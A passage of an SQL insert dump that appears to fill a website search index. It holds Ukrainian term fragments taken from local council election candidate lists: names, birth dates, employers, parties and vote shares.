микола','савченко микола',0,1,1.5,'с000',1,'*'),(1627281,'савченко микола іванович','савченко микола іванович',0,1,1.8,'с000',1,'*'),(1627282,'сафранчук','сафранчук',0,0,0.6,'с000',1,'*'),(1627283,'сафранчук сергій','сафранчук сергій',0,1,1.5333,'с000',1,'*'),(1627284,'сафранчук сергій петрович','сафранчук сергій петрович',0,1,1.8333,'с000',1,'*'),(1627285,'світ-консалт','світ-консалт',0,0,0.8,'с000',1,'*'),(1627286,'світ-консалт головний','світ-консалт головний',0,1,1.7,'с000',1,'*'),(1627287,'світ-консалт головний бухгалтер','світ-консалт головний бухгалтер',0,1,2,'с000',1,'*'),(1627288,'свобода','свобода',0,0,0.4667,'с000',1,'*'),(1627289,'свобода 154','свобода 154',0,1,1.3667,'с000',1,'*'),(1627290,'свобода 154 0','свобода 154 0',0,1,1.4333,'с000',1,'*'),(1627291,'сербін','сербін',0,0,0.4,'с000',1,'*'),(1627292,'сербін валентин','сербін валентин',0,1,1.5,'с000',1,'*'),(1627293,'сербін валентин іванович','сербін валентин іванович',0,1,1.8,'с000',1,'*'),(1627294,'сергій васильович','сергій васильович',0,1,1.5667,'с000',1,'*'),(1627295,'сергій васильович громадянин','сергій васильович громадянин',0,1,1.9333,'с000',1,'*'),(1627296,'сергій петрович','сергій петрович',0,1,1.5,'с000',1,'*'),(1627297,'сергій петрович громадянин','сергій петрович громадянин',0,1,1.8667,'с000',1,'*'),(1627298,'середня безпартійна тов','середня безпартійна тов',0,1,1.7667,'с000',1,'*'),(1627299,'середня спеціальна член','середня спеціальна член',0,1,1.7667,'с000',1,'*'),(1627300,'систем','систем',0,0,0.4,'с000',1,'*'),(1627301,'систем місце','систем місце',0,1,1.4,'с000',1,'*'),(1627302,'систем місце проживання','систем місце проживання',0,1,1.7667,'с000',1,'*'),(1627303,'ситайло','ситайло',0,0,0.4667,'с000',1,'*'),(1627304,'ситайло олександр','ситайло олександр',0,1,1.5667,'с000',1,'*'),(1627305,'ситайло олександр григорович','ситайло олександр григорович',0,1,1.9333,'с000',1,'*'),(1627306,'складами','складами',0,0,0.5333,'с000',1,'*'),(1627307,'складами місце','складами місце',0,1,1.4667,'с000',1,'*'),(1627308,'складами місце проживання','складами місце проживання',0,1,1.8333,'с000',1,'*'),(1627309,'складу ради','складу ради',0,1,1.3667,'с000',1,'*'),(1627310,'складу ради політична','складу ради політична',0,1,1.7,'с000',1,'*'),(1627311,'слуга народу 4','слуга народу 4',0,1,1.4667,'с000',1,'*'),(1627312,'слуга народу 896','слуга народу 896',0,1,1.5333,'с000',1,'*'),(1627313,'слуга народу перший','слуга народу перший',0,1,1.6333,'с000',1,'*'),(1627314,'смт','смт',0,0,0.2,'с000',1,'*'),(1627315,'смт гранітне','смт гранітне',0,1,1.4,'с000',1,'*'),(1627316,'смт гранітне коростенський','смт гранітне коростенський',0,1,1.8667,'с000',1,'*'),(1627317,'сніцаренко','сніцаренко',0,0,0.6667,'с000',1,'*'),(1627318,'сніцаренко леся','сніцаренко леся',0,1,1.5,'с000',1,'*'),(1627319,'сніцаренко леся андріївна','сніцаренко леся андріївна',0,1,1.8333,'с000',1,'*'),(1627320,'солідарність 1157','солідарність 1157',0,1,1.5667,'с000',1,'*'),(1627321,'солідарність 1157 5','солідарність 1157 5',0,1,1.6333,'с000',1,'*'),(1627322,'солідарність 5','солідарність 5',0,1,1.4667,'с000',1,'*'),(1627323,'солідарність 5 14.71','солідарність 5 14.71',0,1,1.6667,'с000',1,'*'),(1627324,'солідарність пенсіонер','солідарність пенсіонер',0,1,1.7333,'с000',1,'*'),(1627325,'солідарність пенсіонер місце','солідарність пенсіонер місце',0,1,1.9333,'с000',1,'*'),(1627326,'солідарність перший','солідарність перший',0,1,1.6333,'с000',1,'*'),(1627327,'солідарність перший кандидат','солідарність перший кандидат',0,1,1.9333,'с000',1,'*'),(1627328,'солідарність тимчасово','солідарність тимчасово',0,1,1.7333,'с000',1,'*'),(1627329,'солідарність тимчасово не','солідарність тимчасово не',0,1,1.8333,'с000',1,'*'),(1627330,'солідарність тов','солідарність тов',0,1,1.5333,'с000',1,'*'),(1627331,'солідарність тов екогран','солідарність тов екогран',0,1,1.8,'с000',1,'*'),(1627332,'спеціаліст відділу супроводження','спеціаліст відділу супроводження',0,1,2,'с000',1,'*'),(1627333,'спеціальна безпартійна компанія','спеціальна безпартійна компанія',0,1,2,'с000',1,'*'),(1627334,'спеціальна член','спеціальна член',0,1,1.5,'с000',1,'*'),(1627335,'спеціальна член політичної','спеціальна член політичної',0,1,1.8667,'с000',1,'*'),(1627336,'справами','справами',0,0,0.5333,'с000',1,'*'),(1627337,'справами місце','справами місце',0,1,1.4667,'с000',1,'*'),(1627338,'справами місце проживання','справами місце проживання',0,1,1.8333,'с000',1,'*'),(1627339,'станції','станції',0,0,0.4667,'с000',1,'*'),(1627340,'станції місце','станції місце',0,1,1.4333,'с000',1,'*'),(1627341,'станції місце проживання','станції місце проживання',0,1,1.8,'с000',1,'*'),(1627342,'старжинський','старжинський',0,0,0.8,'с000',1,'*'),(1627343,'старжинський ігор','старжинський ігор',0,1,1.5667,'с000',1,'*'),(1627344,'старжинський ігор олександрович','старжинський ігор олександрович',0,1,2,'с000',1,'*'),(1627345,'старжинський директор','старжинський директор',0,1,1.7,'с000',1,'*'),(1627346,'старжинський директор місце','старжинський директор місце',0,1,1.9,'с000',1,'*'),(1627347,'столяр','столяр',0,0,0.4,'с000',1,'*'),(1627348,'столяр директор','столяр директор',0,1,1.5,'с000',1,'*'),(1627349,'столяр директор місце','столяр директор місце',0,1,1.7,'с000',1,'*'),(1627350,'столяр олександр','столяр олександр',0,1,1.5333,'с000',1,'*'),(1627351,'столяр олександр васильович','столяр олександр васильович',0,1,1.9,'с000',1,'*'),(1627352,'супроводження','супроводження',0,0,0.8667,'с000',1,'*'),(1627353,'супроводження інформаційних','супроводження інформаційних',0,1,1.9,'с000',1,'*'),(1627354,'супроводження інформаційних систем','супроводження інформаційних систем',0,1,2,'с000',1,'*'),(1627355,'тандем','тандем',0,0,0.4,'т000',1,'*'),(1627356,'тандем директор','тандем директор',0,1,1.5,'т000',1,'*'),(1627357,'тандем директор місце','тандем директор місце',0,1,1.7,'т000',1,'*'),(1627358,'тво','тво',0,0,0.2,'т000',1,'*'),(1627359,'тво за','тво за',0,1,1.2,'т000',1,'*'),(1627360,'тво за яким','тво за яким',0,1,1.3667,'т000',1,'*'),(1627361,'технічний','технічний',0,0,0.6,'т000',1,'*'),(1627362,'технічний ліцей','технічний ліцей',0,1,1.5,'т000',1,'*'),(1627363,'технічний ліцей заступник','технічний ліцей заступник',0,1,1.8333,'т000',1,'*'),(1627364,'технічної','технічної',0,0,0.6,'т000',1,'*'),(1627365,'технічної інвентаризації','технічної інвентаризації',0,1,1.8,'т000',1,'*'),(1627366,'технічної інвентаризації начальник','технічної інвентаризації начальник',0,1,2,'т000',1,'*'),(1627367,'тимчасово','тимчасово',0,0,0.6,'т000',1,'*'),(1627368,'тимчасово не','тимчасово не',0,1,1.4,'т000',1,'*'),(1627369,'тимчасово не працює','тимчасово не працює',0,1,1.6333,'т000',1,'*'),(1627370,'тов екогран','тов екогран',0,1,1.3667,'т000',1,'*'),(1627371,'тов екогран головний','тов екогран головний',0,1,1.6667,'т000',1,'*'),(1627372,'тов малин','тов малин',0,1,1.3,'т000',1,'*'),(1627373,'тов малин енергоінвест','тов малин енергоінвест',0,1,1.7333,'т000',1,'*'),(1627374,'тов папір-мал','тов папір-мал',0,1,1.4333,'т000',1,'*'),(1627375,'тов папір-мал директор','тов папір-мал директор',0,1,1.7333,'т000',1,'*'),(1627376,'тов світ-консалт','тов світ-консалт',0,1,1.5333,'т000',1,'*'),(1627377,'тов світ-консалт головний','тов світ-консалт головний',0,1,1.8333,'т000',1,'*'),(1627378,'тов тандем','тов тандем',0,1,1.3333,'т000',1,'*'),(1627379,'тов тандем директор','тов тандем директор',0,1,1.6333,'т000',1,'*'),(1627380,'тов юнігран','тов юнігран',0,1,1.3667,'т000',1,'*'),(1627381,'тов юнігран головний','тов юнігран головний',0,1,1.6667,'т000',1,'*'),(1627382,'тов юнігран заступник','тов юнігран заступник',0,1,1.7,'т000',1,'*'),(1627383,'тов юнігран начальник','тов юнігран начальник',0,1,1.7,'т000',1,'*'),(1627384,'у депутати к-сть','у депутати к-сть',0,1,1.5333,'у000',1,'*'),(1627385,'у депутати кількість','у депутати кількість',0,1,1.6667,'у000',1,'*'),(1627386,'україни головний','україни головний',0,1,1.5333,'у000',1,'*'),(1627387,'україни головний спеціаліст','україни головний спеціаліст',0,1,1.9,'у000',1,'*'),(1627388,'україни народився 01.02.1970','україни народився 01.02.1970',0,1,1.9333,'у000',1,'*'),(1627389,'україни народився 04.05.1981','україни народився 04.05.1981',0,1,1.9333,'у000',1,'*'),(1627390,'україни народився 05.04.1976','україни народився 05.04.1976',0,1,1.9333,'у000',1,'*'),(1627391,'україни народився 05.05.1992','україни народився 05.05.1992',0,1,1.9333,'у000',1,'*'),(1627392,'україни народився 06.01.1982','україни народився 06.01.1982',0,1,1.9333,'у000',1,'*'),(1627393,'україни народився 09.08.1981','україни народився 09.08.1981',0,1,1.9333,'у000',1,'*'),(1627394,'україни народився 11.05.1991','україни народився 11.05.1991',0,1,1.9333,'у000',1,'*'),(1627395,'україни народився 14.08.1976','україни народився 14.08.1976',0,1,1.9333,'у000',1,'*'),(1627396,'україни народився 14.12.1967','україни народився 14.12.1967',0,1,1.9333,'у000',1,'*'),(1627397,'україни народився 16.04.1969','україни народився 16.04.1969',0,1,1.9333,'у000',1,'*'),(1627398,'україни народився 17.07.1979','україни народився 17.07.1979',0,1,1.9333,'у000',1,'*'),(1627399,'україни народився 19.10.1966','україни народився 19.10.1966',0,1,1.9333,'у000',1,'*'),(1627400,'україни народився 21.07.1982','україни народився 21.07.1982',0,1,1.9333,'у000',1,'*'),(1627401,'україни народився 21.10.1972','україни народився 21.10.1972',0,1,1.9333,'у000',1,'*'),(1627402,'україни народився 23.11.1962','україни народився 23.11.1962',0,1,1.9333,'у000',1,'*'),(1627403,'україни народився 28.01.1977','україни народився 28.01.1977',0,1,1.9333,'у000',1,'*'),(1627404,'україни народився 28.08.1962','україни народився 28.08.1962',0,1,1.9333,'у000',1,'*'),(1627405,'україни народився 28.12.1974','україни народився 28.12.1974',0,1,1.9333,'у000',1,'*'),(1627406,'україни народився 29.05.1986','україни народився 29.05.1986',0,1,1.9333,'у000',1,'*'),(1627407,'україни народився 29.08.1984','україни народився 29.08.1984',0,1,1.9333,'у000',1,'*'),(1627408,'україни народилася 02.07.1970','україни народилася 02.07.1970',0,1,1.9667,'у000',1,'*'),(1627409,'україни народилася 05.08.1958','україни народилася 05.08.1958',0,1,1.9667,'у000',1,'*'),(1627410,'україни народилася 08.07.1973','україни народилася 08.07.1973',0,1,1.9667,'у000',1,'*'),(1627411,'україни народилася 08.11.1968','україни народилася 08.11.1968',0,1,1.9667,'у000',1,'*'),(1627412,'україни народилася 16.05.1967','україни народилася 16.05.1967',0,1,1.9667,'у000',1,'*'),(1627413,'україни народилася 17.02.1969','україни народилася 17.02.1969',0,1,1.9667,'у000',1,'*'),(1627414,'україни народилася 19.06.1975','україни народилася 19.06.1975',0,1,1.9667,'у000',1,'*'),(1627415,'україни народилася 20.06.1977','україни народилася 20.06.1977',0,1,1.9667,'у000',1,'*'),(1627416,'україни народилася 20.11.1967','україни народилася 20.11.1967',0,1,1.9667,'у000',1,'*'),(1627417,'україни народилася 26.06.1958','україни народилася 26.06.1958',0,1,1.9667,'у000',1,'*'),(1627418,'україни народилася 28.09.1971','україни народилася 28.09.1971',0,1,1.9667,'у000',1,'*'),(1627419,'україни народилася 31.08.1987','україни народилася 31.08.1987',0,1,1.9667,'у000',1,'*'),(1627420,'українка','українка',0,0,0.5333,'у000',1,'*'),(1627421,'українка коростенський','українка коростенський',0,1,1.7333,'у000',1,'*'),(1627422,'українка коростенський р-н','українка коростенський р-н',0,1,1.8667,'у000',1,'*'),(1627423,'фізична','фізична',0,0,0.4667,'ф000',1,'*'),(1627424,'фізична особа-підприємець','фізична особа-підприємець',0,1,1.8333,'ф000',1,'*'),(1627425,'фізична особа-підприємець місце','фізична особа-підприємець місце',0,1,2,'ф000',1,'*'),(1627426,'фабрика','фабрика',0,0,0.4667,'ф000',1,'*'),(1627427,'фабрика банкнотного','фабрика банкнотного',0,1,1.6333,'ф000',1,'*'),(1627428,'фабрика банкнотного паперу','фабрика банкнотного паперу',0,1,1.8667,'ф000',1,'*'),(1627429,'федорівка','федорівка',0,0,0.6,'ф000',1,'*'),(1627430,'федорівка малинський','федорівка малинський',0,1,1.6667,'ф000',1,'*'),(1627431,'федорівка малинський р-н','федорівка малинський р-н',0,1,1.8,'ф000',1,'*'),(1627432,'фоп старжинський','фоп старжинський',0,1,1.5333,'ф000',1,'*'),(1627433,'фоп старжинський директор','фоп старжинський директор',0,1,1.8333,'ф000',1,'*'),(1627434,'фоп столяр','фоп столяр',0,1,1.3333,'ф000',1,'*'),(1627435,'фоп столяр директор','фоп столяр директор',0,1,1.6333,'ф000',1,'*'),(1627436,'цеху','цеху',0,0,0.2667,'ц000',1,'*'),(1627437,'цеху місце','цеху місце',0,1,1.3333,'ц000',1,'*'),(1627438,'цеху місце проживання','цеху місце проживання',0,1,1.7,'ц000',1,'*'),(1627439,'член','член',0,0,0.2667,'ч000',1,'*'),(1627440,'член політичної','член політичної',0,1,1.5,'ч000',1,'*'),(1627441,'член політичної партії','член політичної партії',0,1,1.7333,'ч000',1,'*'),(1627442,'шостак','шостак',0,0,0.4,'ш000',1,'*'),(1627443,'шостак олексій','шостак олексій',0,1,1.4667,'ш000',1,'*'),(1627444,'шостак олексій григорович','шостак олексій григорович',0,1,1.8333,'ш000',1,'*'),(1627445,'юнігран','юнігран',0,0,0.4667,'ю000',1,'*'),(1627446,'юнігран головний','юнігран головний',0,1,1.5333,'ю000',1,'*'),(1627447,'юнігран головний енергетик','юнігран головний енергетик',0,1,1.8667,'ю000',1,'*'),(1627448,'юнігран завідуюча','юнігран завідуюча',0,1,1.5667,'ю000',1,'*'),(1627449,'юнігран завідуюча складами','юнігран завідуюча складами',0,1,1.8667,'ю000',1,'*'),(1627450,'юнігран заступник','юнігран заступник',0,1,1.5667,'ю000',1,'*'),(1627451,'юнігран заступник генерального','юнігран заступник генерального',0,1,2,'ю000',1,'*'),(1627452,'юнігран начальник','юнігран начальник',0,1,1.5667,'ю000',1,'*'),(1627453,'юнігран начальник дробарно-сортувальної','юнігран начальник дробарно-сортувальної',0,1,2,'ю000',1,'*'),(1627454,'юріївна','юріївна',0,0,0.4667,'ю000',1,'*'),(1627455,'юріївна громадянка','юріївна громадянка',0,1,1.6,'ю000',1,'*'),(1627456,'юріївна громадянка україни','юріївна громадянка україни',0,1,1.8667,'ю000',1,'*'),(1627457,'юрій','юрій',0,0,0.2667,'ю000',1,'*'),(1627458,'юрій володимирович','юрій володимирович',0,1,1.6,'ю000',1,'*'),(1627459,'юрій володимирович громадянин','юрій володимирович громадянин',0,1,1.9667,'ю000',1,'*'),(1627460,'юрій миколайович','юрій миколайович',0,1,1.5333,'ю000',1,'*'),(1627461,'юрій миколайович громадянин','юрій миколайович громадянин',0,1,1.9,'ю000',1,'*'),(1627462,'юрист','юрист',0,0,0.3333,'ю000',1,'*'),(1627463,'юрист місце','юрист місце',0,1,1.3667,'ю000',1,'*'),(1627464,'юрист місце проживання','юрист місце проживання',0,1,1.7333,'ю000',1,'*'),(1627465,'які обираються','які обираються',0,1,1.4667,'я000',1,'*'),(1627466,'які обираються на','які обираються на',0,1,1.5667,'я000',1,'*'),(1627467,'яким закріплено','яким закріплено',0,1,1.5,'я000',1,'*'),(1627468,'яким закріплено прізвище','яким закріплено прізвище',0,1,1.8,'я000',1,'*'),(1627469,'якої висунула кандидатів','якої висунула кандидатів',0,1,1.8,'я000',1,'*'),(1627470,'якому обрано','якому обрано',0,1,1.4,'я000',1,'*'),(1627471,'якому обрано політична','якому обрано політична',0,1,1.7333,'я000',1,'*'),(1627939,'01.01.1974','01.01.1974',0,0,1,'',1,'*'),(1627940,'01.01.1974 р','01.01.1974 р',0,1,1.4,'р000',1,'*'),(1627941,'01.01.1974 р освіта','01.01.1974 р освіта',0,1,1.6333,'р000',1,'*'),(1627942,'01.01.1977','01.01.1977',0,0,1,'',1,'*'),(1627943,'01.01.1977 р','01.01.1977 р',0,1,1.4,'р000',1,'*'),(1627944,'01.01.1977 р освіта','01.01.1977 р освіта',0,1,1.6333,'р000',1,'*'),(1627945,'02.10.1980','02.10.1980',0,0,1,'',1,'*'),(1627946,'02.10.1980 р','02.10.1980 р',0,1,1.4,'р000',1,'*'),(1627947,'02.10.1980 р освіта','02.10.1980 р освіта',0,1,1.6333,'р000',1,'*'),(1627948,'02.12.1993','02.12.1993',0,0,1,'',1,'*'),(1627949,'02.12.1993 р','02.12.1993 р',0,1,1.4,'р000',1,'*'),(1627950,'02.12.1993 р освіта','02.12.1993 р освіта',0,1,1.6333,'р000',1,'*'),(1627951,'04.01.1956','04.01.1956',0,0,1,'',1,'*'),(1627952,'04.01.1956 р','04.01.1956 р',0,1,1.4,'р000',1,'*'),(1627953,'04.01.1956 р освіта','04.01.1956 р освіта',0,1,1.6333,'р000',1,'*'),(1627954,'05.04.1989','05.04.1989',0,0,1,'',1,'*'),(1627955,'05.04.1989 р','05.04.1989 р',0,1,1.4,'р000',1,'*'),(1627956,'05.04.1989 р освіта','05.04.1989 р освіта',0,1,1.6333,'р000',1,'*'),(1627957,'05.11.1971','05.11.1971',0,0,1,'',1,'*'),(1627958,'05.11.1971 р','05.11.1971 р',0,1,1.4,'р000',1,'*'),(1627959,'05.11.1971 р освіта','05.11.1971 р освіта',0,1,1.6333,'р000',1,'*'),(1627960,'08.04.1973','08.04.1973',0,0,1,'',1,'*'),(1627961,'08.04.1973 р','08.04.1973 р',0,1,1.4,'р000',1,'*'),(1627962,'08.04.1973 р освіта','08.04.1973 р освіта',0,1,1.6333,'р000',1,'*'),(1627963,'1 4.55','1 4.55',0,1,1.2,'',1,'*'),(1627964,'1 4.55 ово','1 4.55 ово',0,1,1.3333,'о000',1,'*'),(1627965,'1 4.55 політична','1 4.55 політична',0,1,1.5333,'п000',1,'*'),(1627966,'1 дєньгаєва','1 дєньгаєва',0,1,1.3667,'д000',1,'*'),(1627967,'1 дєньгаєва ніна','1 дєньгаєва ніна',0,1,1.5333,'д000',1,'*'),(1627968,'1 косинський','1 косинський',0,1,1.4,'к000',1,'*'),(1627969,'1 косинський володимир','1 косинський володимир',0,1,1.7333,'к000',1,'*'),(1627970,'1 харченко','1 харченко',0,1,1.3333,'х000',1,'*'),(1627971,'1 харченко сергій','1 харченко сергій',0,1,1.5667,'х000',1,'*'),(1627972,'10.05.1983','10.05.1983',0,0,1,'',1,'*'),(1627973,'10.05.1983 р','10.05.1983 р',0,1,1.4,'р000',1,'*'),(1627974,'10.05.1983 р освіта','10.05.1983 р освіта',0,1,1.6333,'р000',1,'*'),(1627975,'10.10.1968','10.10.1968',0,0,1,'',1,'*'),(1627976,'10.10.1968 р','10.10.1968 р',0,1,1.4,'р000',1,'*'),(1627977,'10.10.1968 р освіта','10.10.1968 р освіта',0,1,1.6333,'р000',1,'*'),(1627978,'13.06.1963','13.06.1963',0,0,1,'',1,'*'),(1627979,'13.06.1963 р','13.06.1963 р',0,1,1.4,'р000',1,'*'),(1627980,'13.06.1963 р освіта','13.06.1963 р освіта',0,1,1.6333,'р000',1,'*'),(1627981,'14.03.1979','14.03.1979',0,0,1,'',1,'*'),(1627982,'14.03.1979 р','14.03.1979 р',0,1,1.4,'р000',1,'*'),(1627983,'14.03.1979 р освіта','14.03.1979 р освіта',0,1,1.6333,'р000',1,'*'),(1627984,'16 72.73','16 72.73',0,1,1.2667,'',1,'*'),(1627985,'16 72.73 політична','16 72.73 політична',0,1,1.6,'п000',1,'*'),(1627986,'18.09.1968','18.09.1968',0,0,1,'',1,'*'),(1627987,'18.09.1968 р','18.09.1968 р',0,1,1.4,'р000',1,'*'),(1627988,'18.09.1968 р освіта','18.09.1968 р освіта',0,1,1.6333,'р000',1,'*'),(1627989,'2 9.09','2 9.09',0,1,1.2,'',1,'*'),(1627990,'2 9.09 політична','2 9.09 політична',0,1,1.5333,'п000',1,'*'),(1627991,'2 9.09 самовисування','2 9.09 самовисування',0,1,1.6667,'с000',1,'*'),(1627992,'2 раєць віктор','2 раєць віктор',0,1,1.4667,'р000',1,'*'),(1627993,'2 філоненко','2 філоненко',0,1,1.3667,'ф000',1,'*'),(1627994,'2 філоненко михайло','2 філоненко михайло',0,1,1.6333,'ф000',1,'*'),(1627995,'2 філоненко оксана','2 філоненко оксана',0,1,1.6,'ф000',1,'*'),(1627996,'2 шпакович','2 шпакович',0,1,1.3333,'ш000',1,'*'),(1627997,'2 шпакович валентина','2 шпакович валентина',0,1,1.6667,'ш000',1,'*'),(1627998,'20.07.1967','20.07.1967',0,0,1,'',1,'*'),(1627999,'20.07.1967 р','20.07.1967 р',0,1,1.4,'р000',1,'*'),(1628000,'20.07.1967 р освіта','20.07.1967 р освіта',0,1,1.6333,'р000',1,'*'),(1628001,'20.07.1968','20.07.1968',0,0,1,'',1,'*'),(1628002,'20.07.1968 р','20.07.1968 р',0,1,1.4,'р000',1,'*'),(1628003,'20.07.1968 р освіта','20.07.1968 р освіта',0,1,1.6333,'р000',1,'*'),(1628004,'21.06.1962','21.06.1962',0,0,1,'',1,'*'),(1628005,'21.06.1962 р','21.06.1962 р',0,1,1.4,'р000',1,'*'),(1628006,'21.06.1962 р освіта','21.06.1962 р освіта',0,1,1.6333,'р000',1,'*'),(1628007,'22.11.1982','22.11.1982',0,0,1,'',1,'*'),(1628008,'22.11.1982 р','22.11.1982 р',0,1,1.4,'р000',1,'*'),(1628009,'22.11.1982 р освіта','22.11.1982 р освіта',0,1,1.6333,'р000',1,'*'),(1628010,'24.06.1994','24.06.1994',0,0,1,'',1,'*'),(1628011,'24.06.1994 р','24.06.1994 р',0,1,1.4,'р000',1,'*'),(1628012,'24.06.1994 р освіта','24.06.1994 р освіта',0,1,1.6333,'р000',1,'*'),(1628013,'2486','2486',0,0,0.4,'',1,'*'),(1628014,'25.09.1978','25.09.1978',0,0,1,'',1,'*'),(1628015,'25.09.1978 р','25.09.1978 р',0,1,1.4,'р000',1,'*'),(1628016,'25.09.1978 р освіта','25.09.1978 р освіта',0,1,1.6333,'р000',1,'*'),(1628017,'3 дученко','3 дученко',0,1,1.3,'д000',1,'*'),(1628018,'3 дученко крістіна','3 дученко крістіна',0,1,1.6,'д000',1,'*'),(1628019,'3 шпакович','3 шпакович',0,1,1.3333,'ш000',1,'*'),(1628020,'3 шпакович тетяна','3 шпакович тетяна',0,1,1.5667,'ш000',1,'*'),(1628021,'30.04.1960','30.04.1960',0,0,1,'',1,'*'),(1628022,'30.04.1960 р','30.04.1960 р',0,1,1.4,'р000',1,'*'),(1628023,'30.04.1960 р освіта','30.04.1960 р освіта',0,1,1.6333,'р000',1,'*'),(1628024,'30.07.1970','30.07.1970',0,0,1,'',1,'*'),(1628025,'30.07.1970 р','30.07.1970 р',0,1,1.4,'р000',1,'*'),(1628026,'30.07.1970 р освіта','30.07.1970 р освіта',0,1,1.6333,'р000',1,'*'),(1628027,'4 недашківська','4 недашківська',0,1,1.4667,'н000',1,'*'),(1628028,'4 недашківська людмила','4 недашківська людмила',0,1,1.7333,'н000',1,'*'),(1628029,'4 фещенко','4 фещенко',0,1,1.3,'ф000',1,'*'),(1628030,'4 фещенко михайло','4 фещенко михайло',0,1,1.5667,'ф000',1,'*'),(1628031,'4.55','4.55',0,0,0.4,'',1,'*'),(1628032,'4.55 ово','4.55 ово',0,1,1.2667,'о000',1,'*'),(1628033,'4.55 ово прізвище','4.55 ово прізвище',0,1,1.5667,'о000',1,'*'),(1628034,'4.55 політична','4.55 політична',0,1,1.4667,'п000',1,'*'),(1628035,'4.55 політична партія','4.55 політична партія',0,1,1.7,'п000',1,'*'),(1628036,'5 александрук','5 александрук',0,1,1.4333,'а000',1,'*'),(1628037,'5 александрук микола','5 александрук микола',0,1,1.6667,'а000',1,'*'),(1628038,'5 мойсієнко','5 мойсієнко',0,1,1.3667,'м000',1,'*'),(1628039,'5 мойсієнко микола','5 мойсієнко микола',0,1,1.6,'м000',1,'*'),(1628040,'5 петровський','5 петровський',0,1,1.4333,'п000',1,'*'),(1628041,'5 петровський аркадій','5 петровський аркадій',0,1,1.7,'п000',1,'*'),(1628042,'5 шоботенко','5 шоботенко',0,1,1.3667,'ш000',1,'*'),(1628043,'5 шоботенко олександр','5 шоботенко олександр',0,1,1.7,'ш000',1,'*'),(1628044,'6 майстренко','6 майстренко',0,1,1.4,'м000',1,'*'),(1628045,'6 майстренко тетяна','6 майстренко тетяна',0,1,1.6333,'м000',1,'*'),(1628046,'6 ярошенко','6 ярошенко',0,1,1.3333,'я000',1,'*'),(1628047,'6 ярошенко в\'ячеслав','6 ярошенко в',0,1,1.6667,'я000',1,'*'),(1628048,'7 дударенко','7 дударенко',0,1,1.3667,'д000',1,'*'),(1628049,'7 дударенко ірина','7 дударенко ірина',0,1,1.5667,'д000',1,'*'),(1628050,'7 кондратчук','7 кондратчук',0,1,1.4,'к000',1,'*'),(1628051,'7 кондратчук галина','7 кондратчук галина',0,1,1.6333,'к000',1,'*'),(1628052,'7 романчук','7 романчук',0,1,1.3333,'р000',1,'*'),(1628053,'7 романчук олександр','7 романчук олександр',0,1,1.6667,'р000',1,'*'),(1628054,'72.73','72.73',0,0,0.5,'',1,'*'),(1628055,'72.73 політична','72.73 політична',0,1,1.5,'п000',1,'*'),(1628056,'72.73 політична партія','72.73 політична партія',0,1,1.7333,'п000',1,'*'),(1628057,'8 закусило','8 закусило',0,1,1.3333,'з000',1,'*'),(1628058,'8 закусило віта','8 закусило віта',0,1,1.5,'з000',1,'*'),(1628059,'8 олександрук','8 олександрук',0,1,1.4333,'о000',1,'*'),(1628060,'8 олександрук світлана','8 олександрук світлана',0,1,1.7333,'о000',1,'*'),(1628061,'9.09','9.09',0,0,0.4,'',1,'*'),(1628062,'9.09 політична','9.09 політична',0,1,1.4667,'п000',1,'*'),(1628063,'9.09 політична партія','9.09 політична партія',0,1,1.7,'п000',1,'*'),(1628064,'9.09 самовисування','9.09 самовисування',0,1,1.6,'с000',1,'*'),(1628065,'9.09 самовисування 1','9.09 самовисування 1',0,1,1.6667,'с000',1,'*'),(1628066,'chopovitskoji','chopovitskoji',0,0,0.8667,'C132',1,'*'),(1628067,'chopovitskoji selishchnoji','chopovitskoji selishchnoji',0,1,1.8667,'C1324252',1,'*'),(1628068,'chopovitskoji selishchnoji radi','chopovitskoji selishchnoji radi',0,1,2,'C132425263',1,'*'),(1628069,'deputati chopovitskoji','deputati chopovitskoji',0,1,1.7333,'D132132',1,'*'),(1628070,'deputati chopovitskoji selishchnoji','deputati chopovitskoji selishchnoji',0,1,2,'D1321324252',1,'*'),(1628071,'kristina','kristina',0,0,0.5333,'K6235',1,'*'),(1628072,'kristina перукар','kristina перукар',0,1,1.5333,'K6235',1,'*'),(1628073,'kristina перукар місце','kristina перукар місце',0,1,1.7333,'K6235',1,'*'),(1628074,'європейська солідарність 2','європейська солідарність 2',0,1,1.8667,'є000',1,'*'),(1628075,'європейська солідарність громадянка','європейська солідарність громадянка',0,1,2,'є000',1,'*'),(1628076,'і місце','і місце',0,1,1.2333,'і000',1,'*'),(1628077,'і місце проживання','і місце проживання',0,1,1.6,'і000',1,'*'),(1628078,'і правового','і правового',0,1,1.3667,'і000',1,'*'),(1628079,'і правового забезпечення','і правового забезпечення',0,1,1.8,'і000',1,'*'),(1628080,'іванівна політична','іванівна політична',0,1,1.6,'і000',1,'*'),(1628081,'іванівна політична партія','іванівна політична партія',0,1,1.8333,'і000',1,'*'),(1628082,'іванвна','іванвна',0,0,0.4667,'і000',1,'*'),(1628083,'іванвна політична','іванвна політична',0,1,1.5667,'і000',1,'*'),(1628084,'іванвна політична партія','іванвна політична партія',0,1,1.8,'і000',1,'*'),(1628085,'іванович політична','іванович політична',0,1,1.6,'і000',1,'*'),(1628086,'іванович політична партія','іванович політична партія',0,1,1.8333,'і000',1,'*'),(1628087,'іванович самовисування','іванович самовисування',0,1,1.7333,'і000',1,'*'),(1628088,'іванович самовисування громадянин','іванович самовисування громадянин',0,1,2,'і000',1,'*'),(1628089,'інженер','інженер',0,0,0.4667,'і000',1,'*'),(1628090,'інженер з','інженер з',0,1,1.3,'і000',1,'*'),(1628091,'інженер з охорони','інженер з охорони',0,1,1.5667,'і000',1,'*'),(1628092,'ірина','ірина',0,0,0.3333,'і000',1,'*'),(1628093,'ірина рустемівна','ірина рустемівна',0,1,1.5333,'і000',1,'*'),(1628094,'ірина рустемівна політична','ірина рустемівна політична',0,1,1.8667,'і000',1,'*'),(1628095,'або самовисування','або самовисування',0,1,1.5667,'а000',1,'*'),(1628096,'або самовисування кількість','або самовисування кількість',0,1,1.9,'а000',1,'*'),(1628097,'александрук','александрук',0,0,0.7333,'а000',1,'*'),(1628098,'александрук микола','александрук микола',0,1,1.6,'а000',1,'*'),(1628099,'александрук микола володимирович','александрук микола володимирович',0,1,2,'а000',1,'*'),(1628100,'апк лісничий','апк лісничий',0,1,1.4,'а000',1,'*'),(1628101,'апк лісничий місце','апк лісничий місце',0,1,1.6,'а000',1,'*'),(1628102,'апк майстер','апк майстер',0,1,1.3667,'а000',1,'*'),(1628103,'апк майстер лісу','апк майстер лісу',0,1,1.5333,'а000',1,'*'),(1628104,'аркадій','аркадій',0,0,0.4667,'а000',1,'*'),(1628105,'аркадій петрович','аркадій 